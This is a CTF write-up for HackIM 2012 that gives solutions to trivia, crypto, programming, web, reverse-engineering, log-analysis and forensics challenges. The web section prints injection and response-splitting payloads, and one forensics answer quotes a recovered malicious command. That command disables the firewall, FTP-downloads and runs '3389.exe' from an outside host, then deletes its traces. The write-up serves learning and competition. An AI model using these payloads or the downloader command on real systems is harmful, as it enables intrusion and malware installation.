€¦ · web viewafter trying couple of things with sql ... level as nothing was interesting in...
TRANSCRIPT
HackIM 2012 Write up By Dhanesh ‘danny’ K
Trivia: As the name suggests, its all about seek n destroy :P
Trivia 1:
Q. This operating system also refers to a 1982 science fiction film, a board game, and a song off the Prodigy B-Side "What Evil Lurks"
A. Android
Trivia 2:
Q. This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.
A. evil bit
Trivia 3:
Q. This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.
A. RFC 2795
Trivia 4:
Q. Metasploit was originally coded for what purpose?
A. game
Trivia 5:
Q. Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.
A. whitespace
CRYPTO: We will mess with different algos and bang our head with messages which doesn’t make any sense :D
Crypto 1:
Q. Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik
A. Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates
How to: Open the HTML source and you can see a commented HTML tag which points for mirrored keyboard. The whole idea here is to map the keyboard in a different manner, in this case map the keys from left hand side of the keyboard to right hand side of the keyboard.
Example: 0 is the 4th key from right hand side of the keyboard. So we will map it to 4th key from left hand side of the keyboard which is 3.
If you keep on same procedure you can get the decrypted text.
Crypto 2:
Q. White noise
A. Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304
How to: The given document contains spaces and tabs. So you can easily guess that there are only two states, and from that deduce it as binary. Replace space with 1 and tabs with 0, you will get a long binary string. You can take 8bits and convert to HEX/ASCII to get the final string.
Crypto 3:
Q. Base test
A. duoTriGeSimalandNgiti
How to: From the page source, you will get the encoded text as 5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJFrom the looks of the text, you can assume it as either base32 or baes36. From trying it with the decoders, it is base32 but the text is reversed. So you have to reverse the given text, then feed it to base32 decoder to get yet again a base32 encoded text. Decoding that one will give you the final flag.
http://en.wikipedia.org/wiki/Base32 , http://sourceforge.net/projects/cyoencode/
Crypto 4:
Q. Elucidate
A. onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena
How to: Given text is a php script, encoded/obfuscated. The methodology used to understand the script is to replace evals with echos so that we will get intermediate results. First look at the php shows a base64 encoded text which will be decoded and evaled. So, we will decode the base64 encoded text to find out the next part. Next part is again obfuscated with weird variable names and hex+octal encoded text. Its a repetitive job to decode the hex+octal encoded strings and replace the variables to finally get a encoded + gzip compressed php script. After base64 decoding and gzip inflating, we are presented with a code which does some kind of zip file creation and a unused variable which has hex+octal encoded string. Echoing the string will give you the final flag.
<?php
$x= "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
echo $x
?>
Crypto 5:
Q. Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?
A. Learn howto Hide in Plain Sight
How to: Looking at the page source you will find the hidden text. I spent considerable amount of time on it to analyze and finally got a hint that its Steganography. Considering the usual methodologies like LSB modification, wrote a script to dump the LSB of each character and convert it into string to get the flag.
C# code for it-
private void btnDo_Click(object sender, EventArgs e) {
string str = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"; string temp = string.Empty; string flag = string.Empty;
for (int i = 0; i < str.Length; i++) { temp += (str[i] & 1).ToString(); if (temp.Length % 8 == 0) { flag += Convert.ToChar(Convert.ToInt32(temp, 2)).ToString(); temp = string.Empty; }
} MessageBox.Show(flag); }
Programming: Write code bud, write code!!
Programming 1:
Q. Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
A. Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings
How to: From the page source we know that the original text begins like Men at. From this hint its very obvious that the given text is added the location value. Consider the text starts from index 0. Then ‘M’ + 0, ‘e’ + 1 like that we will add the index value. To solve this I didn’t wrote any code. Manually did till Men at some and googled for that part of the text and got the original text from Julius Caesar
Programming 2:
Q. The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
A. 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497
How to: Nothing much to think about, just go on and write code to printout Pascal’s triangle and modify to find out the sum of the middle term. The issue when you are coding in C/C++/C# is that after couple of addition you will hit the integer (32 or 64bit) limit. I am not a script kiddie (:P), so I used a BigInteger library for C#. It is very slow when comparing to crypto level BigInt libraries, but yeah it does work.
Lib: http://www.codeproject.com/Articles/36323/BigInt
C# code-
static void Main(string[] args) { int p = 1337; int q = 0; int x; BigInt sum = BigInt.Parse("0"); BigInt binom = BigInt.Parse("0");
while (q < p) {
for (x = 0; x <= q; ++x) { if ((x == 0) || (q == 0)) binom = 1; else binom = (binom * (q - x + 1)) / x;
if (x == q / 2) { sum += binom; break; } }
q = q + 2;
} Console.WriteLine(sum); Console.ReadLine(); }
Programming 3:
Q. Your Brainfuck Sir ...
A. ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..
How to: The given code is brainfuck interpretable. First thing I did was to run in a emulator (you can get couple of them online or you can convert to C representation and run). The thing to notice here is how well the BF code is formatted. Most of the time BF code is just a single line without any line breaks. This suspicion made me to put output function of BF (.) after every line, which printed most of the flag. Had to put couple of dots in start and end to make it as the real flag.
Programming 4:
Q. Substitute Problem
A. sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
How to: Given instruction are self explanatory. All you need is to code accordingly.
C# code –
private int SearchInNumbers(string s, string[] numbers) { int index = -1; for (int i =0;i<numbers.Length;i++) { if (numbers[i] == s) { index = i; break;
} }
return index; }public void somelevel() { string inp = rchIn.Text; //input from rich text box string[] inl = inp.Split(' ');
string[] search = { " ", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" }; string[] numbers = { "zero", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fouteen", "fifteen", "sixteen", "seventeen", "eigteen", "nineteen", "twenty", "twentyone", "twentytwo", "twentythree", "twentyfour", "twentyfive", "twentysix" };
string temp = string.Empty; string final = string.Empty; foreach (string val in inl) { if (val != "00") { char v = (char)(Convert.ToInt32(val) + 'a' - 1); temp += v.ToString(); } else { int indx = SearchInNumbers(temp,numbers); if (indx < 0) //fcuk!! { MessageBox.Show(temp); } final += search[indx]; temp = string.Empty; } } int ind = SearchInNumbers(temp, numbers); final += search[ind];
string[] arr = final.Split(' '); string ans = string.Empty; foreach (string sar in arr) { ind = SearchInNumbers(sar, numbers); if (ind < 0) //I am lazy for integers :p { ans += "\"" + sar + "\""; } else { ans += search[ind]; } } rchOut.Text = ans; //flag }
Programming 5:
Q. A pinch of salt for your coffee, Sir?
A. b77313
How to: Get the hash for a small data like ‘1’ or ‘a’. After that use your favourite MD5 cracker to get the salt. Note that salt is different for each user. I used barswf to bruteforce the salt successfully.
Web: So you think you know how the WWW work, eh?
Web 1:
Q. Can you view the bytes in password.asp from Me?
A. To get to next level you have to use this URL
http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
More on it: http://projects.webappsec.org/w/page/13246949/Null%20Byte%20Injection
Web 2:
Q. Can you redirect ME to hackim.null.co.in?
A. http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%%20%0D%0AContent-Length%3A%200%0A%0AHTTP/1.1%20302%20Moved%20Temporarily%0ALocation%3Ahackim.null.co.in%0A HTTP/1.1
How to: Idea here is to redirect to another page via response splitting.
More on it: https://www.owasp.org/index.php/HTTP_Response_Splitting
Web 3:
Q. Login System
A. b3149ecea4628efd23d2f86e5a723472
How to: Register some account and see the output in source viewer
You can see the part admin:no. Our idea is to make an user with admin:yes.
Logging in with that user will give us the flag.
Web 4:
Q. Can You Get Me all the Data?
A. myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
How to: The given list is all the Presidents of India. After trying couple of things with SQL injection, it shows all the content. Its an injection only, but its XPATH injection. There are multiple ways to actually get the flag out of this level. Injection I used is something like this: '] | /* | /a[b='
Web 5:
Q. Do You Have What IT Takes to Break into the World's Most Secure Login System?
A. 47c1b025fa18ea96c33fbb6718688c0f
How to: Basic SQLi will give you errors like hacking attempt is detected. To bypass the check/filter, you need to have some special kind of inputs like these: '<>'1
More on it: http://www.exploit-db.com/papers/18263/
Reverse Engineering: Think in reverse, you must!
RE 1:
Q. Basic Test
A. We could talk all day about what AutoHotKey can do for an online poker player
How to: Initial analysis of the downloaded exe showed that its a AutoHotKey compiled script. You just need the reversing application which is readily available here: http://www.autohotkey.com/download/Exe2Ahk.exe
You will get the .ahk file and can see the flag there.
RE 2:
Q. Ask nicely, it will give you what you want
A. AreYouHappyNow?
How to: Initially everyone was stuck at this level as nothing was interesting in the exe until the hint of resource section came. The idea is to change EIP to starting of .rsrc and make sure that the section is RWE (I was stuck here as by-default section was not writable). It has a self modifying code, which will decrypt the rest of the code and show the flags memory in EAX after final decryption.
Couple of things learned – new get base address trick (other than call $+5 pop ebp): http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC
RE 3:
Q. null Mobile Android App
A. Do not let what you cannot do interfere with what you can do.
How to: Started with disassembling with smali and dex2jar. Soon to find out that there is nothing interesting in the code. Next thing to do is to unpack the apk file (which essentially is a zip file) and see the folder structure. The hidden javascript and php files are in \res\raw. After opening the php file found a packed javascript snippet, which upon deobfuscating gave the flag in function mikcah.
http://jsbeautifier.org
RE 4:
Q. Script2
A. Nature has neither kernel nor shell; she is everything at once
How to: This one made me to do and understand lot of gdb. I always escaped out of doing any no-code Linux debugging as I am not a great fan of text based debuggers as the level info a GUI based debugger provides is enormous (GDB is very powerful, but the lack of a good GUI is a real pity). Worry not, we have other ways to do it ;)
Given file is a X64 ELF binary, so you need a x64 Linux distro with gdb. After the initial check, I loaded it into IDA64 and disassembled to get a look of the functionalities. Going through the code, you can understand the decryption function it calls regularly to get the hidden text and info out of the executable. Initial debugging gave me the first check, which checks for a particular date and time and says its expired if the current date and time is more than the hardcoded value (again stored in encrypted format). The decrypted value is in epoch time format. Change the system date and you will be greeted with a cat command executed. At this time only thing u need to do is run the ltrace with the script2 and pass –r and –S 100 to list all the calls and in the calls you will find the flag.
After finishing the challenge, I set out for digging a little deeper with GDB. Installed gdbserver and attached to it from IDA to do a remote debugging from my Windows machine. And guess what, its just AWSOME.
See the results here...
RE 5:
Q. Got Dumped :(
A. TheLastSamurai
How to: Given file is a Windows XP SP3 memory dump. You can load into windbg with needed symbols and put !analyze –v to get the initial info about the crash, Its essentially crashing by accessing 0xdeadbabe, which is being push ret ed from the code. Now we need the crashing application which can be obtained by 2 ways, one easy and another hard.
Easy way to get stub.exe out of dmp file:
Using sos which is useful for managed (.NET) debugging. Use these function to dump all the exe and dlls which are loaded at the time of dump file creation.
.load clr10\sos.dll
!sam folder_path
Now you have a proper stub.exe.
Hard way to get stub.exe out of dmp file:
Open the dmp file in hex editor and search for PE/MZ. You will eventually find stub.exe’s location and copy paste large amount of hex into another file. Now open the new file in any PE editor like CFF explorer to see the section size and remember that when an exe is loaded into memory, it loads in virtual size, so there will be extra padding. You can manually copy paste the sections according to raw size specified in header to finally get a proper exe out of dmp file.
After getting the stub.exe you can load into IDA to find the crashing function, which is supposed to decrypt the string in the memory and show it via message box. You can see a lot of crashing code like push 0xdeadbabe ret, and other like that. After loading the encrypted message into registers, you can directly bypass the execution by changing EIP to decryption routine, which starts with xor esi, esi GetCurrentProcess and GetProcessID calls. Please note that it was supposed to decrypt the strings from the crashed instance, so when it calls GetProcessID, it should return the PID of the crashed application. PID of crashed application can be retrieved from WinDbg (either looking through PEB or just look at the status bar of windbg :P ) as 0xA60. The dumped stub.exe is not fully fixed state, so when you load into debugger and break at EP, change EIP to the decryption function, bypass the crashing code, patch the GetProcessID to return 0xA60. Then it will decrypt the flag and will present you with the flag.
Log Analysis: Its just lot of data :/
LA 1:
Q. Basic
A. 6bb61e3b7bce0931da574d19d1d82c88
How to: From the report, it is easily visible
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
Going to that directory, it lists 2 file. AskMelater.asp seems to be interesting and right clicking and saving to file gives us the format to get the flag.
http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
LA 2:
Q. Mystery Password
How to: Given is a pcap file that you can open in wireshark and look into it. Its pretty straight forward.
LA 3:
Q. Clever Intruder
A. contact.php 6666 192.168.0.107
How to: Used Kiwi log viewer to filter based on the source IP and found the necessary info in the last entry. Contact.php is getting the command in base64 encoded format and if you decode it, you will see the netcat and port.
LA 4:
Q. Exploited!!!
A. CVE-2005-1921
How to: From the log its fairly clear that we are attacking TikiWiki. Initial idea was to get all the CVE ids associated with TikiWiki and try. But it eventually ended in frustration as it didn’t found the flag. Next idea was to see the HTTP response code. As there were a lot of 404s and we are interested only in 200s. It was fairly easy to find the few 200s out of all these junk data.
It was command execution vulnerability in PEAR XML RPC, which was found to be having id CVE-2005-1921.
LA 5:
Q. Waat Laga Server
A. id
page
Tavis Ormandy Julien Tinnes
zuzana
How to: Thats a huge file!!! First thing I did was to run strings on that file which again made 26.3 MB file and search around for the required vulnerabilities. Searching for different commands and jargons like root, shell, /bin/sh, system, CVE, exploit will reveal a lot of information about last two flags. For the first two flags one can look into GET and POST requests, which has response 200 and figure out the vulnerabilities.
For finding the root password, you have to use hash cracker like John the ripper.
Forensics: Have you covered the tracks?
FL 1:
Q. Tum Agar Dhyan Se Baat Meri Suno
A. 12344346765
How to: As the question says, listen carefully. You notice the sound difference in some places. The best way to analyze a sound issue is use tools like Audacity and hear the irregular place carefully(slow motion :D). After hearing you will understand that the sound is reversed in those places which were speaking the flag numbers.
FL 2:
Q. Andar Ch0r
A. 6924289
How to: Provided is a doc file. After dumping the strings and going through it arises the suspicion that the provided file is XLS. Renaming the file extension and opening in Excel gives us a 1 worksheet
names Nullcon. From the text in the page, we are sure that we are in a correct direction. From the strings we also know that there are actually 3 worksheets. From googling it was known that Excel can have hidden worksheets, which can be uncovered by pressing ALT+F11 to launch VB plugin (which is used for Macros). Hidden worksheet has our flag.
Fl 3:
Q. Not Guilty!
A. Shell
REG_SZ
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
How to: Using reglookup-recover gets the deleted registry.
http://manpages.ubuntu.com/manpages/jaunty/man1/reglookup-recover.1.html
FL 4:
Q. Intriguing MBR
A.
How to:
Tools needed: http://www.garykessler.net/software/index.html
Info: http://en.wikipedia.org/wiki/GUID_Partition_Table
First run of GPTparser says that there are 0 partition tables.
So, now we know that the no of partition table is located at offset 592 (80+512). Now the question is how many table entries are there in this given image? To get that info, open the given file in a hex editor and you can easily see a pattern. Count the no. of patterns and you have number of partitions as 9. Now change the byte 592 (0x250) to 9 and again parse with GPTparser.pl.
After parsing the modified file, you will get a list of partition info with LBA addresses. Only thing now to do is arrange in an incrementing manner of LBA, find out the partition type from the GUID given by the parser (match with the wiki article) and you have the flag
FL 5:
Q. Universal Swindlers Bayonet
A. 2GEL32TN
05/01/2012 18:54:36
06/01/2012 17:52:13
mshearts.exe
How to: Volatility for the help. Finding first 3 flags are trivial as we can dump every registry and look for USBSTOR to find it. You have to change the time to IST (add 5:30) and format it properly. For the last flag, I dumped the process nullcon.exe and ran strings over it to find a list of exe names and bruteforced the suspicious ones to find mshearts.exe as the right one.
https://www.volatilesystems.com/default/volatility